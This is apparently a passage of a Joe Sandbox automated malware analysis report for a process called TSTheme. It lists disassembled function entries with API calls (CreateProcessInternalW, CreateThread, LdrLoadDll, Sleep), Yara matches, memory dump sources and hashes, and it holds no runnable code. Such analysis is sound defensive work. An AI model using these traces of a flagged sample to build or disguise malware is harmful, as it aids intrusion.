                                    • Opcode Fuzzy Hash: ac4ab698de29261bde8cb8cf32ce416f5175e04554af1ccdb761101e6eb7bc5a
                                    • Instruction Fuzzy Hash: 2690023220148852D1107158C54474A001587D0311FA9C411B8525658D87A989917521
                                    Function 05142C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 31e519691c354a435b1f10801f9ed520760432fe3a0cea9ac8c5399999fbc93d
                                    • Instruction ID: 0c237cee102b5bd72351a82b6f015eb5ee4efc408721a1aafc66de0fc74b8f91
                                    • Opcode Fuzzy Hash: 31e519691c354a435b1f10801f9ed520760432fe3a0cea9ac8c5399999fbc93d
                                    • Instruction Fuzzy Hash: F690023220140892D10071588544B46001587E0311FA5C016B4225654D8729C9517921
                                    Function 05142CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: cea3dd3c15576c69d70d93b16f7fbedfbb833626f55b02bdf2946d47d476ba88
                                    • Instruction ID: 269a742b7e4b1b0e4c71de5fb4c07994f20dee6961d49775cb05ad75457ce2cf
                                    • Opcode Fuzzy Hash: cea3dd3c15576c69d70d93b16f7fbedfbb833626f55b02bdf2946d47d476ba88
                                    • Instruction Fuzzy Hash: C190023220140452D10075989548646001587E0311FA5D011B9125555EC77989916531
                                    Function 05142F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 14ff4e1748dabf084fd1c920ad43f9c939b308fe6db807d12282ad29c84e617f
                                    • Instruction ID: aa0b77b5f0a093634b4e6c97a12ce7fddff64773a5431a61a00b5386af4dcf19
                                    • Opcode Fuzzy Hash: 14ff4e1748dabf084fd1c920ad43f9c939b308fe6db807d12282ad29c84e617f
                                    • Instruction Fuzzy Hash: 9390026234140492D10071588554B060015C7E1311FA5C015F5165554D872DCD526526
                                    Function 05142FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 4425e727a0e7f81558f48ddf8b9c614810b6998b995312cccab2056d4ab01be9
                                    • Instruction ID: f25e151a39b59592c7ecca3f9f1d4e218cf11c74f9443fd6593e13df072eb7a1
                                    • Opcode Fuzzy Hash: 4425e727a0e7f81558f48ddf8b9c614810b6998b995312cccab2056d4ab01be9
                                    • Instruction Fuzzy Hash: 909002226014009241407168C9849064015ABE12217A5C121B4A99550D866D89655A65
                                    Function 05142FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 1703381bb715b631f65f242b10fb31553bb5248bdcedf0900fad351ba22104c2
                                    • Instruction ID: 9170da81f95c1789ec789acf9b7ee24aef46a2c9e3e6adc19b5309376ecdc860
                                    • Opcode Fuzzy Hash: 1703381bb715b631f65f242b10fb31553bb5248bdcedf0900fad351ba22104c2
                                    • Instruction Fuzzy Hash: 28900222211C0092D20075688D54B07001587D0313FA5C115B4255554CCA2989615921
                                    Function 05142E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: c3e9161b57e1ac125226b692a93f271d14a6ae10fe8d85b7c35ab2353a0bcaf3
                                    • Instruction ID: c9e22dfa73f952b0d78339f573733bb32e172c38879b4349814a7942a31ae946
                                    • Opcode Fuzzy Hash: c3e9161b57e1ac125226b692a93f271d14a6ae10fe8d85b7c35ab2353a0bcaf3
                                    • Instruction Fuzzy Hash: C390022260140552D10171588544616001A87D0251FE5C022B5125555ECB398A92A531
                                    Function 05142EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 34ba5109f73830a8528d81d2aa8044bab160d4fa620dde844f63d9db5569675f
                                    • Instruction ID: 7d487d0d81bc1f93b336854792a7ad55eb96c6940e3f7e39060e2de889133840
                                    • Opcode Fuzzy Hash: 34ba5109f73830a8528d81d2aa8044bab160d4fa620dde844f63d9db5569675f
                                    • Instruction Fuzzy Hash: F590026220180453D14075588944607001587D0312FA5C011B6165555E8B3D8D516535
                                    Function 05142B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 43a5f54319eb349d5ac57aef0a2f520cffd3869d9677e1f1e1f4af684ccd5a0e
                                    • Instruction ID: 6f666d0ee8766c36ed85004dc24b5c6067a066f233436e42bcc160ce83e58ad5
                                    • Opcode Fuzzy Hash: 43a5f54319eb349d5ac57aef0a2f520cffd3869d9677e1f1e1f4af684ccd5a0e
                                    • Instruction Fuzzy Hash: 5B90026220240053410571588554616401A87E0211BA5C021F5115590DC63989916525
                                    Function 05142BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 0bdedee711d55a16bd4e674bcac7d1838787984d73774f22891e048974305414
                                    • Instruction ID: bd3165e58c341b3cb194e3233963298832d2cb685b4c6aba7334a111161edd78
                                    • Opcode Fuzzy Hash: 0bdedee711d55a16bd4e674bcac7d1838787984d73774f22891e048974305414
                                    • Instruction Fuzzy Hash: 9390023260540852D15071588554746001587D0311FA5C011B4125654D87698B557AA1
                                    Function 05142BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: c881aa06fe4b9ab9999a5ab1d6f352ddd2c3373d925b084de7b8e729eedf83b4
                                    • Instruction ID: da713a671be4610a7ecca03b24ce49e165e03370965157e2c6a273b52e714b37
                                    • Opcode Fuzzy Hash: c881aa06fe4b9ab9999a5ab1d6f352ddd2c3373d925b084de7b8e729eedf83b4
                                    • Instruction Fuzzy Hash: 2C90023220140852D1807158854464A001587D1311FE5C015B4126654DCB298B597BA1
                                    Function 05142BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: f83c2b8afe5146a5e0b9ebe0a1e475b12ede6d213ffc54dd10c874815a28bdf8
                                    • Instruction ID: a2313f85e90e13e006a21268cce5846af848f76a332371e29c6771621e1112bd
                                    • Opcode Fuzzy Hash: f83c2b8afe5146a5e0b9ebe0a1e475b12ede6d213ffc54dd10c874815a28bdf8
                                    • Instruction Fuzzy Hash: 8090023220544892D14071588544A46002587D0315FA5C011B4165694D97398E55BA61
                                    Function 05142AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 0b5e545b82c37e2acda18b5c8644ca90140291fb13764ca1d644b275934b60c7
                                    • Instruction ID: 9eab613dd99a84b1a11fbf515190b4f95accc48442c2f18179da0f9493c6be96
                                    • Opcode Fuzzy Hash: 0b5e545b82c37e2acda18b5c8644ca90140291fb13764ca1d644b275934b60c7
                                    • Instruction Fuzzy Hash: EC900437311400530105F55C47445070057C7D53713F5C031F5117550CD735CD715531
                                    Function 05142AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: aa03c5bcda3283f9959f1f7c271c7f6a17c3b31e32c138c6dc03f1e2535b0119
                                    • Instruction ID: d188a89be193b143541c3b2dfbc45ac11667115067966a7b2f8a595e09ae06f4
                                    • Opcode Fuzzy Hash: aa03c5bcda3283f9959f1f7c271c7f6a17c3b31e32c138c6dc03f1e2535b0119
                                    • Instruction Fuzzy Hash: CD900226221400520145B558474450B045597D63613E5C015F5517590CC73589655721
                                    Function 051435C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 892a09855521812f487bfa68fd13b92e76529d09c2da6531c9a06a177935e455
                                    • Instruction ID: f6a678c4e3750ad506c89a613023b45cd100fa337dcc5968a3bc38875a06a299
                                    • Opcode Fuzzy Hash: 892a09855521812f487bfa68fd13b92e76529d09c2da6531c9a06a177935e455
                                    • Instruction Fuzzy Hash: 6390023260550452D10071588654706101587D0211FB5C411B4525568D87A98A5169A2
                                    Function 051439B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: b39f78631dc2991432aed0600c5296b6adf6ff622be261cce09127486d5f1992
                                    • Instruction ID: 3d1eb68f702592c7593d0455a45b6703e02590f4ce6772fb5ca4c2aefd80c139
                                    • Opcode Fuzzy Hash: b39f78631dc2991432aed0600c5296b6adf6ff622be261cce09127486d5f1992
                                    • Instruction Fuzzy Hash: 7E90022224545152D150715C85446164015A7E0211FA5C021B4915594D866989556621
                                    Function 02FE2BB0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNELBASE(000007D0), ref: 02FE2C6B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep
                                    • String ID: net.dll$wininet.dll
                                    • API String ID: 3472027048-1269752229
                                    • Opcode ID: bdadc0dac40b56115606484e8e2aceec8f339c11d014b895a33d309faf797cd4
                                    • Instruction ID: bec83efcb04a86689f6f92b5a06362ab36017df62225d378cdc27693374ef4c8
                                    • Opcode Fuzzy Hash: bdadc0dac40b56115606484e8e2aceec8f339c11d014b895a33d309faf797cd4
                                    • Instruction Fuzzy Hash: EB318BB1601704ABCB25EF64CC80FE7BBB9AB88754F10851CAA5E5B240D770BA40CFA1
                                    Function 02FDEC35 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 104COMMON
                                    Download Yara Rule
                                    APIs
                                    • CoInitialize.OLE32(00000000), ref: 02FDEC57
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Initialize
                                    • String ID: @J7<
                                    • API String ID: 2538663250-2016760708
                                    • Opcode ID: 45be8e0665f91a66548f4b0290b3e1207ab626fac49afff0bc023e1aec409247
                                    • Instruction ID: f142aca2502d614469ce8f25e5e7f90b423a32c318309c442d6626b28289203e
                                    • Opcode Fuzzy Hash: 45be8e0665f91a66548f4b0290b3e1207ab626fac49afff0bc023e1aec409247
                                    • Instruction Fuzzy Hash: 7E3132B5A0060A9FDB10DF98DC809EEB7BABF88304B148559E615AB204D775AE05CFA0
                                    Function 02FDEC40 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                    Download Yara Rule
                                    APIs
                                    • CoInitialize.OLE32(00000000), ref: 02FDEC57
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Initialize
                                    • String ID: @J7<
                                    • API String ID: 2538663250-2016760708
                                    • Opcode ID: 9363a6702421ab0f6ff2f8fd15f5a530115a55a30fbed5d1f59165347dfaf66a
                                    • Instruction ID: aa507aeaa28bbb2baf85e030d6e18631fc4cd2b1ff515ae9229f2f2d856bbcda
                                    • Opcode Fuzzy Hash: 9363a6702421ab0f6ff2f8fd15f5a530115a55a30fbed5d1f59165347dfaf66a
                                    • Instruction Fuzzy Hash: 713134B5A0060A9FDB00DFD8DC809EFB7BABF48304B144559E616EB214D775EE05CBA0
                                    Function 02FD453B Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7cdbb073212cc2a369da66f7c783e2ca650cd8513bdb17ed23c4ebdca57cd041
                                    • Instruction ID: 63f9776dc010f9d8fce3a691561efd0878ace29cc3d4df93a379f823b3ace807
                                    • Opcode Fuzzy Hash: 7cdbb073212cc2a369da66f7c783e2ca650cd8513bdb17ed23c4ebdca57cd041
                                    • Instruction Fuzzy Hash: FA21BB72900602ABDF11CF78DC81BE7B7AAEB55780F588129E5189B205E330E551DFA0
                                    Function 02FD44C0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02FD4532
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Load
                                    • String ID:
                                    • API String ID: 2234796835-0
                                    • Opcode ID: 0a5b46808d07e863b45c642623f8f10eb7d4fdfe879cc680468a100e3a6e7ddd
                                    • Instruction ID: b8c5916bd7ef0df48b58781edbdb01f40f9ac5b77529935fcf59b08073c41dcf
                                    • Opcode Fuzzy Hash: 0a5b46808d07e863b45c642623f8f10eb7d4fdfe879cc680468a100e3a6e7ddd
                                    • Instruction Fuzzy Hash: EA011EB9D0020EABDF10EAA4DC41F9EB7B9AB44348F0441A5AA0997240F671EB58CB91
                                    Function 02FE8400 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateProcessInternalW.KERNELBASE(02FD0FA1,02FD0FC9,02FD0DA1,00000000,02FD7D73,00000010,02FD0FC9,?,?,00000044,02FD0FC9,00000010,02FD7D73,00000000,02FD0DA1,02FD0FC9), ref: 02FE8463
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateInternalProcess
                                    • String ID:
                                    • API String ID: 2186235152-0
                                    • Opcode ID: c6e99a57c4e07f766d75fb7922e620f08570094a86bf9a7d7399b37cdde083c4
                                    • Instruction ID: cde839fdf56df2a3cc3a813519ebd1396e2b0e4e7e308617e5c810ae4d163ca4
                                    • Opcode Fuzzy Hash: c6e99a57c4e07f766d75fb7922e620f08570094a86bf9a7d7399b37cdde083c4
                                    • Instruction Fuzzy Hash: 3F018CB2205108BBCB44DE99DC80EEB77AEAF8C754F518208BA1DE3244D670F9518BA4
                                    Function 02FC9670 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02FC96B5
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateThread
                                    • String ID:
                                    • API String ID: 2422867632-0
                                    • Opcode ID: 9e40194725a0dbd261c67ade3f25a02c07d3bc37d3a00c0c1f036b1131d42630
                                    • Instruction ID: 4bb5de2168bc46592f7cb081fd487a09970a2ef20d44b73ab7ab45f2b5bff2b6
                                    • Opcode Fuzzy Hash: 9e40194725a0dbd261c67ade3f25a02c07d3bc37d3a00c0c1f036b1131d42630
                                    • Instruction Fuzzy Hash: 2DF0653338020436E63165EA9D02FDB734C9B807A5F240029F70DDB1C0D5A1B5014AA8
                                    Function 02FC966C Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02FC96B5
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateThread
                                    • String ID:
                                    • API String ID: 2422867632-0
                                    • Opcode ID: dde5df3f75148c663cdc4680fdee99d9dd0947639ec8543dcb2fd4b9232569c3
                                    • Instruction ID: b0c767e6e414cf56778e84d09a67cf823026b09d878a21de9b534b4cb7a94ca9
                                    • Opcode Fuzzy Hash: dde5df3f75148c663cdc4680fdee99d9dd0947639ec8543dcb2fd4b9232569c3
                                    • Instruction Fuzzy Hash: 59F09233780200B6E63176958D42FDB765D9F807A5F34001DF70DAB1C0D9A5B9018BA8
                                    Function 02FE7000 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 02FE7040
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Path$NameName_
                                    • String ID:
                                    • API String ID: 3514427675-0
                                    • Opcode ID: 027390277e231c9ef91be817d0851fd10d4170f76ba3d1588b18670b920579f9
                                    • Instruction ID: e3e70d44d240888f9ba037962c8bf3a7b80f78516f59c5754f0247b1730e76f5
                                    • Opcode Fuzzy Hash: 027390277e231c9ef91be817d0851fd10d4170f76ba3d1588b18670b920579f9
                                    • Instruction Fuzzy Hash: 7CF039B6200609BBCA10EF59DC41FEBB7ADEFC9760F504509FA08A7241C670B9118BF4
                                    Function 02FE8370 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,1A5FE856,00000007,00000000,00000004,00000000,02FD3D9B,000000F4,?,?,?,?,?), ref: 02FE83AC
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
